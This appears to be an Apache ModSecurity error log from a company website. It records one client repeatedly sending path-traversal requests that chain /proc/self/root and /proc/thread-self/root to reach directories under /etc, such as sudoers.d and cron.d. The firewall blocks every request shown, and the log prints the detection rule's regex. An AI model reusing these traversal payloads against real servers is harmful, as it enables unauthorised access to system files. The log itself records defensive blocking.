[Tue Mar 17 14:31:08.711084 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:52886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP3Bj0p0SRWAqcjGF7VAAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:10.155992 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.241.31:52900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP3r-sgTmmJoPuMdy4OAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:11.691398 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:52910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP3weiSKl8TjouI-YbfwAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:12.123407 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38284] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:31:13.112031 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.31:52912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP4aBJNF7axNlVR0UZeAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:14.410322 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:52924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP4qBJNF7axNlVR0UZegAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:15.704014 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:52938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP48U6Sx0TG1YjmQiwuwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:17.816434 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:52948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP5at8Nd0UC_OcbVHMoQAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:19.117797 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:55546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP59Y0UrI5A3LftIz93AAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:20.452128 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:55560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP6Bj0p0SRWAqcjGF7VwAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:21.741243 2026] [:error] [pid 7004:tid 140411557287680] [client 74.7.241.31:55570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP6cU6Sx0TG1YjmQiwxgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:23.084136 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.241.31:55584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP6xj0p0SRWAqcjGF7WQAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:24.418390 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.31:55598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP7AeiSKl8TjouI-YbhgAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:25.727142 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:55610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP7QeiSKl8TjouI-YbiAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:27.074232 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.241.31:55612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP7xj0p0SRWAqcjGF7XAAAAwk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:28.462925 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.241.31:41674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP8L-sgTmmJoPuMdy4OQAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:29.899266 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.241.31:41688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP8a4xEDsg_V3ESNZOVQAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:31.392454 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:41690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP86BJNF7axNlVR0UZfwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:32.843399 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:41698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP9L-sgTmmJoPuMdy4OgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:34.129474 2026] [proxy_fcgi:error] [pid 6296:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:31:34.215108 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.31:41702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP9geiSKl8TjouI-YbiQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:35.546505 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:41710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP98U6Sx0TG1YjmQiw1QAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:36.827459 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:41720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP-K4xEDsg_V3ESNZOVgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:38.107039 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.241.31:51272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 